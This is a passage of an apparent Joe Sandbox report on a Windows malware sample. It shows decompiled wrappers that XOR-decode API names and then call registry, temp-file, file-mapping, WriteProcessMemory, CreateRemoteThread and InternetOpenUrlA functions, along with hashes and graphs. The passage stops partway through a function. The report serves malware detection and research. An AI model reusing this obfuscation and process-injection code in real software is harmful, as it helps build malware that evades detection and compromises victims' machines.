                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID: B$E$Q$U$f$l$m$s$u$x
                                                                    • API String ID: 3660427363-273335635
                                                                    • Opcode ID: 37d569ee2a9650e2b65ece66d9952c42dc3211da0fd475c934745671ee75b6b6
                                                                    • Instruction ID: bba9428a2ca5f2d9be5b1466d77cc7af8b28eef1a984592111ba24520ffb2ef2
                                                                    • Opcode Fuzzy Hash: 37d569ee2a9650e2b65ece66d9952c42dc3211da0fd475c934745671ee75b6b6
                                                                    • Instruction Fuzzy Hash: 7B11F66150C3C0AEE302DB688844A8BBFD55BE6348F08CD9DE5DC87252D6B9D548DB27
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 173 41c7d0-41c7da 174 41c842-41c865 RegSetValueExA 173->174 175 41c7dc-41c825 173->175 176 41c827-41c82f 175->176 176->176 177 41c831-41c83d call 41c580 176->177 177->174
                                                                    C-Code - Quality: 100%
                                                                    			E0041C7D0(void* _a4, char* _a8, int _a12, int _a16, char* _a20, int _a24) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				long _t24;
                                                                    				void* _t26;
                                                                    				char* _t35;
                                                                    
                                                                    				if( *0x447f04 == 0) {
                                                                    					_v15 = 0x70;
                                                                    					_v12 = 0x70;
                                                                    					_v6 = 0x70;
                                                                    					 *_t35 = 0x47;
                                                                    					_v14 = 0x72;
                                                                    					_v13 = 0x46;
                                                                    					_v11 = 0x61;
                                                                    					_v10 = 0x43;
                                                                    					_v9 = 0x74;
                                                                    					_v8 = 0x79;
                                                                    					_v7 = 0x60;
                                                                    					_v5 = 0x50;
                                                                    					_v4 = 0x6d;
                                                                    					_v3 = 0x54;
                                                                    					_v2 = 0x15;
                                                                    					_t26 = 0;
                                                                    					do {
                                                                    						 *(_t35 + _t26) =  *(_t35 + _t26) ^ 0x00000015;
                                                                    						_t26 = _t26 + 1;
                                                                    					} while (_t26 < 0xf);
                                                                    					 *0x447f04 = E0041C580(_t35);
                                                                    				}
                                                                    				_t24 = RegSetValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t24;
                                                                    			}




















                                                                    0x0041c7da
                                                                    0x0041c7de
                                                                    0x0041c7e2
                                                                    0x0041c7e6
                                                                    0x0041c7ea
                                                                    0x0041c7ee
                                                                    0x0041c7f3
                                                                    0x0041c7f8
                                                                    0x0041c7fd
                                                                    0x0041c802
                                                                    0x0041c807
                                                                    0x0041c80c
                                                                    0x0041c811
                                                                    0x0041c816
                                                                    0x0041c81b
                                                                    0x0041c820
                                                                    0x0041c825
                                                                    0x0041c827
                                                                    0x0041c827
                                                                    0x0041c82b
                                                                    0x0041c82c
                                                                    0x0041c83d
                                                                    0x0041c83d
                                                                    0x0041c860
                                                                    0x0041c865

                                                                    APIs
                                                                    • RegSetValueExA.KERNELBASE(?,?,?,?,?,?,00000000,?,?,00000001,?,?,000000A5), ref: 0041C860
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: C$F$P$T$`$a$m$r$t$y
                                                                    • API String ID: 3702945584-2717926119
                                                                    • Opcode ID: 9a783b334f41fd99ac3fb2d02aa96c4d7932ab3afc8a113854e44ab51ace0f5f
                                                                    • Instruction ID: 12993b21cd5766ed6c9e9b1ac181c2c804d6462b1fb535ed64756d8d6eda03d2
                                                                    • Opcode Fuzzy Hash: 9a783b334f41fd99ac3fb2d02aa96c4d7932ab3afc8a113854e44ab51ace0f5f
                                                                    • Instruction Fuzzy Hash: FF115B6100C3C0AEE301D769C844B4BBFD15BEA708F08C98CE1CC87252D279DA48C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 41bbd0-41bbda 181 41bc4b-41bc64 GetTempFileNameA 180->181 182 41bbdc-41bc2e 180->182 183 41bc30-41bc38 182->183 183->183 184 41bc3a-41bc46 call 41a600 183->184 184->181
                                                                    C-Code - Quality: 100%
                                                                    			E0041BBD0(CHAR* _a4, CHAR* _a8, int _a12, CHAR* _a16) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				int _t24;
                                                                    				void* _t26;
                                                                    				char* _t34;
                                                                    
                                                                    				if( *0x447e98 == 0) {
                                                                    					_v19 = 0x56;
                                                                    					_v16 = 0x56;
                                                                    					_v10 = 0x56;
                                                                    					_v6 = 0x56;
                                                                    					 *_t34 = 0x74;
                                                                    					_v18 = 0x47;
                                                                    					_v17 = 0x67;
                                                                    					_v15 = 0x5e;
                                                                    					_v14 = 0x43;
                                                                    					_v13 = 0x75;
                                                                    					_v12 = 0x5a;
                                                                    					_v11 = 0x5f;
                                                                    					_v9 = 0x7d;
                                                                    					_v8 = 0x52;
                                                                    					_v7 = 0x5e;
                                                                    					_v5 = 0x72;
                                                                    					_v4 = 0x33;
                                                                    					_t26 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t26) =  *(_t34 + _t26) ^ 0x00000033;
                                                                    						_t26 = _t26 + 1;
                                                                    					} while (_t26 < 0x11);
                                                                    					 *0x447e98 = E0041A600(_t34);
                                                                    				}
                                                                    				_t24 = GetTempFileNameA(_a4, _a8, _a12, _a16); // executed
                                                                    				return _t24;
                                                                    			}






















                                                                    0x0041bbda
                                                                    0x0041bbe0
                                                                    0x0041bbe4
                                                                    0x0041bbe8
                                                                    0x0041bbec
                                                                    0x0041bbf0
                                                                    0x0041bbf4
                                                                    0x0041bbf9
                                                                    0x0041bbfe
                                                                    0x0041bc02
                                                                    0x0041bc07
                                                                    0x0041bc0c
                                                                    0x0041bc11
                                                                    0x0041bc16
                                                                    0x0041bc1b
                                                                    0x0041bc20
                                                                    0x0041bc24
                                                                    0x0041bc29
                                                                    0x0041bc2e
                                                                    0x0041bc30
                                                                    0x0041bc30
                                                                    0x0041bc34
                                                                    0x0041bc35
                                                                    0x0041bc46
                                                                    0x0041bc46
                                                                    0x0041bc5f
                                                                    0x0041bc64

                                                                    APIs
                                                                    • GetTempFileNameA.KERNELBASE(?,?,?,?,00000104,?,00000012,?,00000001), ref: 0041BC5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileNameTemp
                                                                    • String ID: 3$C$G$R$Z$_$g$r$u$}
                                                                    • API String ID: 745986568-3742349677
                                                                    • Opcode ID: 1f707675465ab44d43585bca2e86f6154bab03a41cfa8a3412d594cfa164e95b
                                                                    • Instruction ID: 0aa05d3606b24facbe349c6b14a0a2affd38bbc94f36f494d3d9caf5282f1197
                                                                    • Opcode Fuzzy Hash: 1f707675465ab44d43585bca2e86f6154bab03a41cfa8a3412d594cfa164e95b
                                                                    • Instruction Fuzzy Hash: 2B11F86140C3C0AED302D768D444A5BBFD56BA6208F08CD9DE0DC87253D2B9D649C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 187 41be50-41be5a 188 41bedb-41bf03 CreateRemoteThread 187->188 189 41be5c-41beb9 187->189 190 41bec0-41bec8 189->190 190->190 191 41beca-41bed6 call 41a600 190->191 191->188
                                                                    C-Code - Quality: 100%
                                                                    			E0041BE50(void* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a12, _Unknown_base(*)()* _a16, void* _a20, long _a24, DWORD* _a28) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				void* _t29;
                                                                    				void* _t31;
                                                                    				char* _t43;
                                                                    
                                                                    				if( *0x447ea8 == 0) {
                                                                    					_v18 = 0x53;
                                                                    					_v15 = 0x53;
                                                                    					_v13 = 0x53;
                                                                    					_v9 = 0x53;
                                                                    					_v5 = 0x53;
                                                                    					 *_t43 = 0x75;
                                                                    					_v19 = 0x44;
                                                                    					_v17 = 0x57;
                                                                    					_v16 = 0x42;
                                                                    					_v14 = 0x64;
                                                                    					_v12 = 0x5b;
                                                                    					_v11 = 0x59;
                                                                    					_v10 = 0x42;
                                                                    					_v8 = 0x62;
                                                                    					_v7 = 0x5e;
                                                                    					_v6 = 0x44;
                                                                    					_v4 = 0x57;
                                                                    					_v3 = 0x52;
                                                                    					_v2 = 0x36;
                                                                    					_t31 = 0;
                                                                    					do {
                                                                    						 *(_t43 + _t31) =  *(_t43 + _t31) ^ 0x00000036;
                                                                    						_t31 = _t31 + 1;
                                                                    					} while (_t31 < 0x13);
                                                                    					 *0x447ea8 = E0041A600(_t43);
                                                                    				}
                                                                    				_t29 = CreateRemoteThread(_a4, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t29;
                                                                    			}
























                                                                    0x0041be5a
                                                                    0x0041be62
                                                                    0x0041be66
                                                                    0x0041be6a
                                                                    0x0041be6e
                                                                    0x0041be72
                                                                    0x0041be76
                                                                    0x0041be7a
                                                                    0x0041be7f
                                                                    0x0041be83
                                                                    0x0041be87
                                                                    0x0041be8c
                                                                    0x0041be91
                                                                    0x0041be96
                                                                    0x0041be9a
                                                                    0x0041be9f
                                                                    0x0041bea4
                                                                    0x0041bea9
                                                                    0x0041bead
                                                                    0x0041beb2
                                                                    0x0041beb7
                                                                    0x0041bec0
                                                                    0x0041bec0
                                                                    0x0041bec4
                                                                    0x0041bec5
                                                                    0x0041bed6
                                                                    0x0041bed6
                                                                    0x0041befe
                                                                    0x0041bf03

                                                                    APIs
                                                                    • CreateRemoteThread.KERNELBASE(?,?,?,?,?,?,?,0000042A,00000000,?), ref: 0041BEFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CreateRemoteThread
                                                                    • String ID: 6$D$D$R$Y$[$^$b$d
                                                                    • API String ID: 4286614544-1178246246
                                                                    • Opcode ID: 315622383cbddc1be975f2711b0f67529e490feb2d877e409c097a4eadaf0ff9
                                                                    • Instruction ID: f1a7791b1b465e0f5b1eea92c5e87a2abd0c05829898ada81fc5db09abc7b4d4
                                                                    • Opcode Fuzzy Hash: 315622383cbddc1be975f2711b0f67529e490feb2d877e409c097a4eadaf0ff9
                                                                    • Instruction Fuzzy Hash: EA21E86100D3C0EED316DB789844A8BBFE55FEA208F08C99DE1D987242D2B9D649C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 194 41aa70-41aa7a 195 41aafb-41ab1e CreateFileMappingA 194->195 196 41aa7c-41aadb 194->196 197 41aae0-41aae8 196->197 197->197 198 41aaea-41aaf6 call 41a600 197->198 198->195
                                                                    C-Code - Quality: 100%
                                                                    			E0041AA70(void* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a12, long _a16, long _a20, CHAR* _a24) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				void* _t28;
                                                                    				void* _t31;
                                                                    				char* _t42;
                                                                    
                                                                    				if( *0x447de0 == 0) {
                                                                    					_v18 = 0x66;
                                                                    					_v15 = 0x66;
                                                                    					_v11 = 0x66;
                                                                    					_v8 = 0x73;
                                                                    					_v7 = 0x73;
                                                                    					 *_t42 = 0x40;
                                                                    					_v19 = 0x71;
                                                                    					_v17 = 0x62;
                                                                    					_v16 = 0x77;
                                                                    					_v14 = 0x45;
                                                                    					_v13 = 0x6a;
                                                                    					_v12 = 0x6f;
                                                                    					_v10 = 0x4e;
                                                                    					_v9 = 0x62;
                                                                    					_v6 = 0x6a;
                                                                    					_v5 = 0x6d;
                                                                    					_v4 = 0x64;
                                                                    					_v3 = 0x42;
                                                                    					_v2 = 3;
                                                                    					_t31 = 0;
                                                                    					do {
                                                                    						 *(_t42 + _t31) =  *(_t42 + _t31) ^ 0x00000003;
                                                                    						_t31 = _t31 + 1;
                                                                    					} while (_t31 < 0x13);
                                                                    					 *0x447de0 = E0041A600(_t42);
                                                                    				}
                                                                    				_t28 = CreateFileMappingA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t28;
                                                                    			}
























                                                                    0x0041aa7a
                                                                    0x0041aa7e
                                                                    0x0041aa82
                                                                    0x0041aa86
                                                                    0x0041aa90
                                                                    0x0041aa94
                                                                    0x0041aa98
                                                                    0x0041aa9c
                                                                    0x0041aaa1
                                                                    0x0041aaa5
                                                                    0x0041aaaa
                                                                    0x0041aaaf
                                                                    0x0041aab3
                                                                    0x0041aab8
                                                                    0x0041aabd
                                                                    0x0041aac1
                                                                    0x0041aac5
                                                                    0x0041aaca
                                                                    0x0041aacf
                                                                    0x0041aad4
                                                                    0x0041aad9
                                                                    0x0041aae0
                                                                    0x0041aae0
                                                                    0x0041aae4
                                                                    0x0041aae5
                                                                    0x0041aaf6
                                                                    0x0041aaf6
                                                                    0x0041ab19
                                                                    0x0041ab1e

                                                                    APIs
                                                                    • CreateFileMappingA.KERNEL32(?,?,?,?,?,?,00000003,00000000,00000000,BBBBBB95,?,?,?), ref: 0041AB19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileMapping
                                                                    • String ID: B$E$N$d$m$o$q$w
                                                                    • API String ID: 524692379-1276929054
                                                                    • Opcode ID: 8d9dbeff7d4e61ae2a272c68e2d4ff6fc01b099e09e4c8af7b019fef991b212e
                                                                    • Instruction ID: ab419ad2179a7c818e422f598b7e76367d53f0bcf2aaaaa4670770a174dbaecc
                                                                    • Opcode Fuzzy Hash: 8d9dbeff7d4e61ae2a272c68e2d4ff6fc01b099e09e4c8af7b019fef991b212e
                                                                    • Instruction Fuzzy Hash: E41147A110D3C0AED302DB688444A9BBFE51FA6288F08CD9DE0C987253D2B9C648C777
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 208 41d320-41d32a 209 41d390-41d3bd RegEnumKeyExA 208->209 210 41d32c-41d371 208->210 211 41d373-41d37d 210->211 211->211 212 41d37f-41d38b call 41c580 211->212 212->209
                                                                    C-Code - Quality: 100%
                                                                    			E0041D320(void* _a4, int _a8, char* _a12, int* _a16, int* _a20, char* _a24, int* _a28, struct _FILETIME* _a32) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				long _t25;
                                                                    				void* _t27;
                                                                    				CHAR* _t40;
                                                                    
                                                                    				if( *0x447f68 == 0) {
                                                                    					_v13 = 0x45;
                                                                    					_v6 = 0x45;
                                                                    					 *_t40 = 0x52;
                                                                    					_v15 = 0x65;
                                                                    					_v14 = 0x67;
                                                                    					_v12 = 0x6e;
                                                                    					_v11 = 0x75;
                                                                    					_v10 = 0x6d;
                                                                    					_v9 = 0x4b;
                                                                    					_v8 = 0x65;
                                                                    					_v7 = 0x79;
                                                                    					_v5 = 0x78;
                                                                    					_v4 = 0x41;
                                                                    					_v3 = 0;
                                                                    					_t27 = 0;
                                                                    					do {
                                                                    						_t27 = _t27 + 1;
                                                                    					} while (_t27 < 0xe);
                                                                    					 *0x447f68 = E0041C580(_t40);
                                                                    				}
                                                                    				_t25 = RegEnumKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                                    				return _t25;
                                                                    			}



















                                                                    0x0041d32a
                                                                    0x0041d330
                                                                    0x0041d334
                                                                    0x0041d338
                                                                    0x0041d33c
                                                                    0x0041d340
                                                                    0x0041d345
                                                                    0x0041d34a
                                                                    0x0041d34f
                                                                    0x0041d354
                                                                    0x0041d359
                                                                    0x0041d35d
                                                                    0x0041d362
                                                                    0x0041d367
                                                                    0x0041d36c
                                                                    0x0041d371
                                                                    0x0041d373
                                                                    0x0041d379
                                                                    0x0041d37a
                                                                    0x0041d38b
                                                                    0x0041d38b
                                                                    0x0041d3b8
                                                                    0x0041d3bd

                                                                    APIs
                                                                    • RegEnumKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00020019,?,?), ref: 0041D3B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Enum
                                                                    • String ID: A$K$g$m$n$u$x$y
                                                                    • API String ID: 2928410991-86279912
                                                                    • Opcode ID: 93dfe84b4767f2aed691f018d1467db73dcc74ed97c8d0a676bad416a971feeb
                                                                    • Instruction ID: ae3f665cac3c821db2f832d382fbbaba429cf33b6f2656a92c3f0bae1c37e479
                                                                    • Opcode Fuzzy Hash: 93dfe84b4767f2aed691f018d1467db73dcc74ed97c8d0a676bad416a971feeb
                                                                    • Instruction Fuzzy Hash: FD11F3A110C3C0AED305DB689884A5BBFE55BEA708F08CD5CF0EC87252D6B9D54AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 201 41bd10-41bd1a 202 41bd9b-41bdb9 WriteProcessMemory 201->202 203 41bd1c-41bd7a 201->203 204 41bd80-41bd88 203->204 204->204 205 41bd8a-41bd96 call 41a600 204->205 205->202
                                                                    C-Code - Quality: 100%
                                                                    			E0041BD10(void* _a4, void* _a8, void* _a12, long _a16, SIZE_T* _a20) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				int _t27;
                                                                    				void* _t29;
                                                                    				char* _t39;
                                                                    
                                                                    				if( *0x447ea0 == 0) {
                                                                    					_v16 = 0x2d;
                                                                    					_v11 = 0x2d;
                                                                    					_v7 = 0x2d;
                                                                    					 *_t39 = 0x1f;
                                                                    					_v19 = 0x3a;
                                                                    					_v18 = 0x21;
                                                                    					_v17 = 0x3c;
                                                                    					_v15 = 0x18;
                                                                    					_v14 = 0x3a;
                                                                    					_v13 = 0x27;
                                                                    					_v12 = 0x2b;
                                                                    					_v10 = 0x3b;
                                                                    					_v9 = 0x3b;
                                                                    					_v8 = 5;
                                                                    					_v6 = 0x25;
                                                                    					_v5 = 0x27;
                                                                    					_v4 = 0x3a;
                                                                    					_v3 = 0x31;
                                                                    					_v2 = 0x48;
                                                                    					_t29 = 0;
                                                                    					do {
                                                                    						 *(_t39 + _t29) =  *(_t39 + _t29) ^ 0x00000048;
                                                                    						_t29 = _t29 + 1;
                                                                    					} while (_t29 < 0x13);
                                                                    					 *0x447ea0 = E0041A600(_t39);
                                                                    				}
                                                                    				_t27 = WriteProcessMemory(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t27;
                                                                    			}
























                                                                    0x0041bd1a
                                                                    0x0041bd22
                                                                    0x0041bd26
                                                                    0x0041bd2a
                                                                    0x0041bd2e
                                                                    0x0041bd32
                                                                    0x0041bd36
                                                                    0x0041bd3b
                                                                    0x0041bd40
                                                                    0x0041bd45
                                                                    0x0041bd49
                                                                    0x0041bd4e
                                                                    0x0041bd53
                                                                    0x0041bd57
                                                                    0x0041bd5b
                                                                    0x0041bd60
                                                                    0x0041bd65
                                                                    0x0041bd6a
                                                                    0x0041bd6e
                                                                    0x0041bd73
                                                                    0x0041bd78
                                                                    0x0041bd80
                                                                    0x0041bd80
                                                                    0x0041bd84
                                                                    0x0041bd85
                                                                    0x0041bd96
                                                                    0x0041bd96
                                                                    0x0041bdb4
                                                                    0x0041bdb9

                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?,0000042A,00000000,?), ref: 0041BDB4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID: !$%$'$'$+$1$<$H
                                                                    • API String ID: 3559483778-3019244770
                                                                    • Opcode ID: ae1499043fa7ca658bb1ef164a5d6f501db0f5ebd3a8cd16d1461c3dee428b2d
                                                                    • Instruction ID: 5e87cd926afed49a6306a3d1a406ef8ea48f253caea45bc17d074818fee51e0d
                                                                    • Opcode Fuzzy Hash: ae1499043fa7ca658bb1ef164a5d6f501db0f5ebd3a8cd16d1461c3dee428b2d
                                                                    • Instruction Fuzzy Hash: 3C11EA6100C3C0AED306DB689488A8FBFD55FA6308F48CD9DE0C987242D779D649C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 215 41d680-41d68a 216 41d6fb-41d71e InternetOpenUrlA 215->216 217 41d68c-41d6de 215->217 218 41d6e0-41d6e8 217->218 218->218 219 41d6ea-41d6f6 call 41d440 218->219 219->216
                                                                    C-Code - Quality: 100%
                                                                    			E0041D680(void* _a4, char* _a8, char* _a12, long _a16, long _a20, long _a24) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
